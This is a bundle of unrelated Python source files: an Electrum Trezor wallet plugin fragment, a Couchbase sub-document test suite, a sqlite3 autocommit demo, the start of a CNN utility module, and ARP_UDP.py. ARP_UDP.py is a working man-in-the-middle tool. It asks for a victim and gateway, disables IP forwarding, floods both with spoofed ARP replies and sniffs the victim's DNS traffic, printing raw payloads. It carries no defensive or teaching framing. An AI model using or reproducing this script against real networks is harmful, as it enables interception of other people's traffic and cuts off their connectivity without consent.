devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
subdoc_autotestgenerator.py
|
import queue
import copy
import json
import threading
from multiprocessing import Process
import couchbase.subdocument as SD
from membase.api.rest_client import RestConnection
from memcached.helper.data_helper import VBucketAwareMemcached
from lib.couchbase_helper.random_gen import RandomDataGenerator
from lib.couchbase_helper.subdoc_helper import SubdocHelper
from .subdoc_base import SubdocBaseTest
class SubdocAutoTestGenerator(SubdocBaseTest):
def setUp(self):
super(SubdocAutoTestGenerator, self).setUp()
self.prepopulate_data = self.input.param("prepopulate_data", False)
self.verify_data_without_paths = self.input.param("verify_data_without_paths", True)
self.number_of_arrays = self.input.param("number_of_arrays", 1)
self.verbose_func_usage = self.input.param("verbose_func_usage", False)
self.nesting_level = self.input.param("nesting_level", 0)
self.mutation_operation_type = self.input.param("mutation_operation_type", "any")
self.force_operation_type = self.input.param("force_operation_type", None)
self.run_data_verification = self.input.param("run_data_verification", True)
self.prepopulate_item_count = self.input.param("prepopulate_item_count", 10000)
self.seed = self.input.param("seed", 0)
self.run_mutation_mode = self.input.param("run_mutation_mode", "seq")
self.client = self.direct_client(self.master, self.buckets[0])
self.build_kv_store = self.input.param("build_kv_store", False)
self.total_writer_threads = self.input.param("total_writer_threads", 10)
self.number_of_documents = self.input.param("number_of_documents", 10)
self.concurrent_threads = self.input.param("concurrent_threads", 10)
self.randomDataGenerator = RandomDataGenerator()
self.subdoc_gen_helper = SubdocHelper()
self.kv_store = {}
self.load_thread_list = []
if self.prepopulate_data:
self.run_sync_data()
def tearDown(self):
super(SubdocAutoTestGenerator, self).tearDown()
def test_readonly(self):
self.client = self.direct_client(self.master, self.buckets[0])
error_result = {}
data_set = self.generate_json_for_nesting()
base_json = self.generate_json_for_nesting()
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
data_key = "test_readonly"
self.set(self.client, data_key, json_document)
pairs = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
data = self.get(self.client, key=data_key, path=path)
if data != pairs[path]:
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], data)
self.assertTrue(len(error_result) == 0, error_result)
def test_exists(self):
self.client = self.direct_client(self.master, self.buckets[0])
error_result = {}
data_set = self.generate_json_for_nesting()
base_json = self.generate_json_for_nesting()
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
data_key = "test_readonly"
self.set(self.client, data_key, json_document)
pairs = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
try:
self.exists(self.client, data_key, path, xattr=self.xattr)
except Exception as ex:
error_result[path] = str(ex)
self.assertTrue(len(error_result) == 0, error_result)
def test_seq_mutations_dict(self):
self.mutation_operation_type = "dict"
self.test_seq_mutations()
def test_seq_mutations_array(self):
self.mutation_operation_type = "array"
self.test_seq_mutations()
def test_multi_seq_mutations(self):
self.verify_result = self.input.param("verify_result", False)
queue = queue.Queue()
number_of_times = (self.number_of_documents // self.concurrent_threads)
process_list = []
number_of_buckets = len(self.buckets)
for x in range(self.concurrent_threads):
base_json = self.generate_json_for_nesting()
data_set = self.generate_nested(base_json, base_json, 2)
json_document = self.generate_nested(base_json, data_set, 10)
bucket_number = x % number_of_buckets
prefix = self.buckets[bucket_number].name + "_" + str(x) + "_"
p = Process(target=self.test_seq_mutations,
args=(queue, number_of_times, prefix, json_document, self.buckets[bucket_number]))
p.start()
process_list.append(p)
for p in process_list:
p.join()
if self.verify_result:
filename = "/tmp/" + self.randomDataGenerator.random_uuid() + "_dump_failure.txt"
queue_size = queue.qsize()
if not queue.empty():
self._dump_data(filename, queue)
self.assertTrue(queue_size == 0, "number of failures {0}, check file {1}".format(queue.qsize(), filename))
def test_seq_mutations(self, queue, number_of_times, prefix, json_document, bucket):
client = self.direct_client(self.master, bucket)
for x in range(number_of_times):
self.number_of_operations = self.input.param("number_of_operations", 50)
data_key = prefix + self.randomDataGenerator.random_uuid()
self.set(client, data_key, json_document)
operations = self.subdoc_gen_helper.build_sequence_operations(json_document, self.number_of_operations,
seed=self.seed,
mutation_operation_type=self.mutation_operation_type,
force_operation_type=self.force_operation_type)
for operation in operations:
function = getattr(self, operation["subdoc_api_function_applied"])
try:
data_value = operation["data_value"]
if not self.use_sdk_client:
data_value = json.dumps(data_value)
function(client, data_key, operation["new_path_impacted_after_mutation_operation"], data_value)
except Exception as ex:
queue.put("bucket {0}, error {1}".format(bucket.name, str(ex)))
data = self.get_all(client, data_key)
error_result = None
if data != json_document:
error_result = "bucket {0}, expected {1}, actual = {2}".format(bucket.name, json_document, data)
if error_result != None:
queue.put(error_result)
def test_concurrent_mutations_dict(self):
self.mutation_operation_type = "dict"
self.test_concurrent_mutations()
def test_concurrent_mutations_array(self):
self.mutation_operation_type = "array"
self.test_concurrent_mutations()
def test_concurrent_mutations(self):
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
base_json = randomDataGenerator.random_json()
data_set = randomDataGenerator.random_json()
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
data_key = "test_concurrent_mutations"
self.run_mutation_concurrent_operations(self.buckets[0], data_key, json_document)
def run_mutation_concurrent_operations(self, bucket=None, document_key="", json_document={}):
client = self.direct_client(self.master, bucket)
self.number_of_operations = self.input.param("number_of_operations", 10)
# INSERT INTO COUCHBASE
self.set(client, document_key, json_document)
# RUN PARALLEL OPERATIONS
operations = self.subdoc_gen_helper.build_concurrent_operations(
json_document, self.number_of_operations, seed=self.seed,
mutation_operation_type=self.mutation_operation_type,
force_operation_type=self.force_operation_type)
# RUN CONCURRENT THREADS
thread_list = []
result_queue = queue.Queue()
self.log.info(" number of operations {0}".format(len(operations)))
for operation in operations:
client = self.direct_client(self.master, bucket)
t = Process(target=self.run_mutation_operation, args=(client, document_key, operation, result_queue))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
queue_data = []
while not result_queue.empty():
queue_data.append(result_queue.get())
self.assertTrue(len(queue_data) == 0, queue_data)
# CHECK RESULT IN THE END
json_document = copy.deepcopy(operations[len(operations) - 1]["mutated_data_set"])
pairs = {}
error_result = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
data = self.get(client, document_key, path)
if data != pairs[path]:
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], data)
self.assertTrue(len(error_result) == 0, error_result)
def run_mutation_operation(self, client, document_key, operation, result_queue):
function = getattr(self, operation["subdoc_api_function_applied"])
try:
data_value = operation["data_value"]
if not self.use_sdk_client:
data_value = json.dumps(data_value)
function(client, document_key, operation["new_path_impacted_after_mutation_operation"], data_value)
except Exception as ex:
self.log.info(str(ex))
result_queue.put({"error": str(ex), "operation_type": operation["subdoc_api_function_applied"]})
''' Generic Test case for running sequence operations based tests '''
def run_mutation_operations_for_situational_tests(self):
self.run_load_during_mutations = self.input.param("run_load_during_mutations", False)
self.number_of_documents = self.input.param("number_of_documents", 10)
self.number_of_operations = self.input.param("number_of_operations", 10)
self.concurrent_threads = self.input.param("concurrent_threads", 10)
error_queue = queue.Queue()
document_info_queue = queue.Queue()
thread_list = []
# RUN INPUT FILE READ THREAD
document_push = threading.Thread(target=self.push_document_info,
args=(self.number_of_documents, document_info_queue))
document_push.start()
# RUN WORKER THREADS
for x in range(self.concurrent_threads):
t = Process(target=self.worker_operation_run, args=(
document_info_queue, error_queue, self.buckets[0], self.mutation_operation_type, self.force_operation_type))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
# ERROR ANALYSIS
error_msg = ""
error_count = 0
if not error_queue.empty():
# Dump Re-run file
dump_file = open('/tmp/dump_failure.txt', 'wb')
while not error_queue.empty():
error_count += 1
error_data = error_queue.get()
dump_file.write(json.dumps(error_data["error_result"]))
dump_file.close()
# Fail the test with result count
self.assertTrue(error_count == 0, "error count {0}".format(error_count))
''' Generic Test case for running sequence operations based tests '''
def test_mutation_operations(self):
self.run_load_during_mutations = self.input.param("run_load_during_mutations", False)
self.number_of_documents = self.input.param("number_of_documents", 10)
self.number_of_operations = self.input.param("number_of_operations", 10)
self.concurrent_threads = self.input.param("concurrent_threads", 10)
error_queue = queue.Queue()
document_info_queue = queue.Queue()
thread_list = []
# RUN INPUT FILE READ THREAD
document_push = threading.Thread(target=self.push_document_info,
args=(self.number_of_documents, document_info_queue))
document_push.start()
document_push.join()
self.sleep(2)
# RUN WORKER THREADS
for bucket in self.buckets:
for x in range(self.concurrent_threads * len(self.buckets)):
# use thread instead of process because Process did not return an updated error queue
t = threading.Thread(target=self.worker_operation_run, args=(
document_info_queue, error_queue, bucket, self.mutation_operation_type, self.force_operation_type))
t.start()
thread_list.append(t)
if self.run_load_during_mutations:
self.run_async_data()
for t in thread_list:
t.join()
for t in self.load_thread_list:
if t.is_alive():
if t is not None:
t.signal = False
# ERROR ANALYSIS
queue_size = error_queue.qsize()
filename = '/tmp/dump_failure_{0}.txt'.format(self.randomDataGenerator.random_uuid())
if not error_queue.empty():
self._dump_data(filename, error_queue)
self.assertTrue(queue_size == 0, "number of failures {0}, check file {1}".format(error_queue.qsize(), filename))
''' Generate Sample data for testing '''
def push_document_info(self, number_of_documents, document_info_queue):
for x in range(number_of_documents):
document_info = {}
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
document_info["document_key"] = self.randomDataGenerator.random_uuid() + "_key_" + str(x)
document_info["seed"] = randomDataGenerator.random_int()
base_json = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
data_set = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
document_info["json_document"] = json_document
document_info_queue.put(document_info)
''' Worker for sequence operations on JSON '''
def worker_operation_run(self,
queue,
error_queue,
bucket,
mutation_operation_type="any",
force_operation_type=None):
client = self.direct_client(self.master, bucket)
while not queue.empty():
document_info = queue.get()
document_key = document_info["document_key"]
json_document = document_info["json_document"]
seed = document_info["seed"]
logic, error_result = self.run_mutation_operations(client, bucket,
document_key=document_key, json_document=json_document,
seed=seed,
number_of_operations=self.number_of_operations,
mutation_operation_type=mutation_operation_type,
force_operation_type=force_operation_type)
if not logic:
error_queue.put({"error_result": error_result, "seed": seed})
''' Method to run sequence operations for a given JSON document '''
def run_mutation_operations(self,
client,
bucket,
document_key="document_key",
json_document={},
seed=0,
number_of_operations=10,
mutation_operation_type="any",
force_operation_type=None):
original_json_copy = copy.deepcopy(json_document)
self.set(client, document_key, json_document)
self.log.info(" Test ON KEY :: {0}".format(document_key))
if self.run_mutation_mode == "seq":
operations = self.subdoc_gen_helper.build_sequence_operations(
json_document,
max_number_operations=number_of_operations,
seed=seed,
mutation_operation_type=mutation_operation_type,
force_operation_type=force_operation_type)
# self.log.info("TOTAL OPERATIONS CALCULATED {0} ".format(len(operations)))
operation_index = 1
for operation in operations:
function = getattr(self, operation["subdoc_api_function_applied"])
try:
data_value = operation["data_value"]
if not self.use_sdk_client:
data_value = json.dumps(operation["data_value"])
function(client, document_key, operation["new_path_impacted_after_mutation_operation"], data_value)
operation_index += 1
except Exception as ex:
return False, operation
else:
logic, result = self.run_concurrent_mutation_operations(document_key, bucket, seed, json_document,
number_of_operations, mutation_operation_type,
force_operation_type)
if not logic:
return False, logic
# self.log.info(" END WORKING ON {0}".format(document_key))
# json_document = operations[len(operations)-1]["mutated_data_set"]
if self.build_kv_store:
self.kv_store[document_key] = operations[len(operations) - 1]["mutated_data_set"]
error_result = {}
if self.run_data_verification:
if self.verify_data_without_paths:
data = self.get_all(client, document_key)
if data != json_document:
error_result = "expected {0}, actual = {1}".format(json_document, data)
return False, error_result
else:
pairs = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
# self.log.info(" Analyzing path {0}".format(path))
check_data = True
try:
data = self.get(client, document_key, path)
except Exception as ex:
check_data = False
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], str(ex))
self.print_operations(operations)
self.log.info("_______________________________________________")
self.log.info(" path in question {0} ".format(path))
self.log.info("ORIGINAL {0} ".format(original_json_copy))
self.log.info("EXPECTED {0} ".format(json_document))
self.log.info("ACTUAL {0} ".format(self.get_all(client, document_key)))
self.log.info("_______________________________________________")
return False, error_result
if check_data and data != pairs[path]:
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], data)
if len(error_result) != 0:
return False, error_result
return True, error_result
def print_operations(self, operations):
index = 0
for operation in operations:
index += 1
self.log.info(" +++++++++++++++++++++++++ mutation # {0} +++++++++++++++++++++++++ ".format(index))
for k, v in operation.items():
self.log.info("{0} :: {1}".format(k, v))
def run_concurrent_mutation_operations(self, document_key, bucket, seed, json_document, number_of_operations,
mutation_operation_type, force_operation_type):
result_queue = queue.Queue()
operations = self.subdoc_gen_helper.build_concurrent_operations(
json_document,
max_number_operations=number_of_operations,
seed=seed,
mutation_operation_type=mutation_operation_type,
force_operation_type=force_operation_type)
self.log.info("TOTAL OPERATIONS CALCULATED {0} ".format(len(operations)))
thread_list = []
for operation in operations:
client = self.direct_client(self.master, bucket)
t = Process(target=self.run_mutation_operation, args=(client, document_key, operation, result_queue))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
if result_queue.empty():
return True, None
return False, result_queue
def run_sync_data(self):
self.load_thread_list = []
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
base_json = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
data_set = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
if self.prepopulate_data:
self.load_thread_list = []
for bucket in self.buckets:
for x in range(self.total_writer_threads):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
t = Process(target=self.run_populate_data_per_bucket, args=(
client, bucket, json_document, (self.prepopulate_item_count // self.total_writer_threads), x))
t.start()
self.load_thread_list.append(t)
for t in self.load_thread_list:
t.join()
def run_async_data(self):
self.load_thread_list = []
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
base_json = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
data_set = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
if self.prepopulate_data:
self.load_thread_list = []
for bucket in self.buckets:
for x in range(self.total_writer_threads):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
t = Process(target=self.run_populate_data_per_bucket, args=(
client, bucket, json_document, (self.prepopulate_item_count // self.total_writer_threads), x))
t.start()
self.load_thread_list.append(t)
def run_populate_data_per_bucket(self, client, bucket, json_document, prepopulate_item_count, prefix):
for x in range(prepopulate_item_count):
key = str(prefix) + "_subdoc_" + str(x)
try:
client.set(key, 0, 0, json.dumps(json_document))
except Exception as ex:
self.log.info(ex)
def _dump_data(self, filename, queue):
target = open(filename, 'w')
while queue.empty():
data = queue.get()
target.write(data)
target.close()
''' Method to verify kv store data set '''
def run_verification(self, bucket, kv_store={}):
client = self.direct_client(self.master, bucket)
error_result = {}
for document_key in list(kv_store.keys()):
pairs = {}
json_document = kv_store[document_key]
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
opaque, cas, data = client.get_sd(document_key, path)
data = json.loads(data)
if data != pairs[path]:
error_result[path] = "key = {0}, expected {1}, actual = {2}".format(document_key, pairs[path], data)
self.assertTrue(len(error_result) != 0, error_result)
# DOC COMMANDS
def set(self, client, key, value):
try:
if self.verbose_func_usage:
self.log.info(" set ----> {0} ".format(key))
if self.use_sdk_client:
client.set(key, value)
else:
jsonDump = json.dumps(value)
client.set(key, 0, 0, jsonDump)
except Exception:
raise
# SUB DOC COMMANDS
# GENERIC COMMANDS
def delete(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" delete ----> {0} ".format(path))
if self.use_sdk_client:
client.mutate_in(key, SD.remove(path, xattr=self.xattr))
else:
client.delete_sd(key, path)
except Exception:
raise
def replace(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" replace ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.replace(path, value, xattr=self.xattr))
else:
client.replace_sd(key, path, value)
except Exception:
raise
def get_all(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" get ----> {0} ".format(key))
if self.use_sdk_client:
r, v, d = client.get(key)
return d
else:
r, v, d = client.get(key)
return json.loads(d)
except Exception:
raise
def get(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" get ----> {0} :: {1}".format(key, path))
if self.use_sdk_client:
d = client.retrieve_in(key, path).get(0)[1]
return d
else:
r, v, d = client.get_sd(key, path)
return json.loads(d)
except Exception:
raise
def exists(self, client, key='', path='', value=None):
try:
if self.use_sdk_client:
client.lookup_in(key, SD.exists(path)) # xattr not supported?
else:
client.exists_sd(key, path)
except Exception:
raise
def counter(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" counter ----> {0} :: {1} + {2}".format(key, path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.counter(path, int(value), xattr=self.xattr))
else:
client.counter_sd(key, path, value)
except Exception:
raise
# DICTIONARY SPECIFIC COMMANDS
def dict_add(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" dict_add ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.insert(path, value, xattr=self.xattr))
else:
client.dict_add_sd(key, path, value)
except Exception:
raise
def dict_upsert(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" dict_upsert ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.upsert(path, value, xattr=self.xattr))
else:
client.dict_upsert_sd(key, path, value)
except Exception:
raise
# ARRAY SPECIFIC COMMANDS
def array_add_last(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_last ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_append(path, value, xattr=self.xattr))
else:
client.array_push_last_sd(key, path, value)
except Exception:
raise
def array_add_first(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_first ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_prepend(path, value, xattr=self.xattr))
else:
client.array_push_first_sd(key, path, value)
except Exception:
raise
def array_add_unique(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_unique ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_addunique(path, value, xattr=self.xattr))
else:
client.array_add_unique_sd(key, path, value)
except Exception:
raise
def array_add_insert(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_insert ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_insert(path, value, xattr=self.xattr))
else:
client.array_add_insert_sd(key, path, value)
except Exception:
raise
|
sqlite3_autocommit.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Illustrate the effect of autocommit mode.
"""
#end_pymotw_header
import logging
import sqlite3
import sys
import threading
import time
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s (%(threadName)-10s) %(message)s',
)
db_filename = 'todo.db'
isolation_level = None # autocommit mode
def writer():
my_name = threading.currentThread().name
with sqlite3.connect(db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
cursor.execute('update task set priority = priority + 1')
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('PAUSING')
time.sleep(1)
return
def reader():
my_name = threading.currentThread().name
with sqlite3.connect(db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('wait over')
cursor.execute('select * from task')
logging.debug('SELECT EXECUTED')
results = cursor.fetchall()
logging.debug('results fetched')
return
if __name__ == '__main__':
ready = threading.Event()
threads = [
threading.Thread(name='Reader 1', target=reader),
threading.Thread(name='Reader 2', target=reader),
threading.Thread(name='Writer 1', target=writer),
threading.Thread(name='Writer 2', target=writer),
]
[ t.start() for t in threads ]
time.sleep(1)
logging.debug('setting ready')
ready.set()
[ t.join() for t in threads ]
|
ARP_UDP.py
|
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import threading
from termcolor import colored
os.system("clear")
print("""
____ ___________ __________
| | \______ ______ )
| | /| | \| ___)
| | / | ` \ |
|______/ /_______ /____|
\/
""")
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
VIP = input("\nVictim: ")
GW = input("Gateway: ")
IFACE = input("Interface: ")
str(GW)
str(VIP)
str(IFACE)
def pkthandler(pkt):
try:
ip = pkt[IP]
except IndexError:
pass
try:
src = ip.src
dst = ip.dst
except UnboundLocalError:
pass
if pkt.haslayer(UDP):
udp = pkt[UDP]
print("--------------------------------------------------------\n\n")
print(" .:{}:. ".format(colored('UDP','red')))
print(" ")
print(" \033[1;36mSource IP:\033[00m {} \033[1;36mDestination IP:\033[00m {}".format(src, dst))
print(" \033[1;36mSource Port:\033[00m {} \033[1;36mDestination Port:\033[00m {}".format(udp.sport, udp.dport))
print(" \033[1;36mLength:\033[00m {} ".format(udp.len))
print(" \033[1;36mChecksum:\033[00m {} ".format(udp.chksum))
rawLoad = pkt.getlayer(Raw)
if rawLoad == None: pass
else:
print(" \033[1;36mRaw:\n\n\033[00m {} ".format(rawLoad))
print(" ")
print(" ")
hexdump(pkt)
def v_poison():
v = ARP(pdst=VIP, psrc=GW,)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
except KeyboardInterupt: # Functions constructing and sending the ARP packets
sys.exit(1)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
except KeyboardInterupt:
sys.exit(1)
def format_muti_lines(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
vthread = []
gwthread = []
while True: # Threads
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
try:
pkt = sniff(iface=str(IFACE),filter='udp port 53',prn=pkthandler)
except KeyboardInterrupt:
os.system("{ cd ..; python3 net.py; }")
exit(0)
if __name__ == "__main__":
UDP()
|
cnn_utility_functions.py
|
#!/usr/bin/python
# PROGRAMMER: Luke Wilson
# DATE CREATED: 2021-10-12
# REVISED DATE: 2021-01-01
# PURPOSE: Provide utility functions for import into main
# - u1_get_input_args()
# - u2_load_processed_data(data_dir)
# - u3_process_data(transform_request)
# - u4_data_iterator(dict_datasets)
# - u5_time_limited_input(prompt, default=True)
# - u6_user_input_prompt(prompt, default)
##
# Import libraries
import json
import argparse
import os, random
import numpy as np
import torch
import torch.nn.functional as F
from torchvision import transforms, datasets, models
from torch import nn, optim
from PIL import Image
from threading import Thread
def u1_get_input_args():
'''
Purpose:
- Creates and stores command line arguments inputted by the user.
- Attaches default arguments and help text to aid user.
Command Line Arguments:
1. Data directory as --dir
2. Choose to load model as --load
3. Choose to train model as --train
4. Define number of training epochs as --epoch
5. Define network number of hidden layers --layer
6. Define learnrate as --learn
7. Choose pretrained CNN model as --model
Returns:
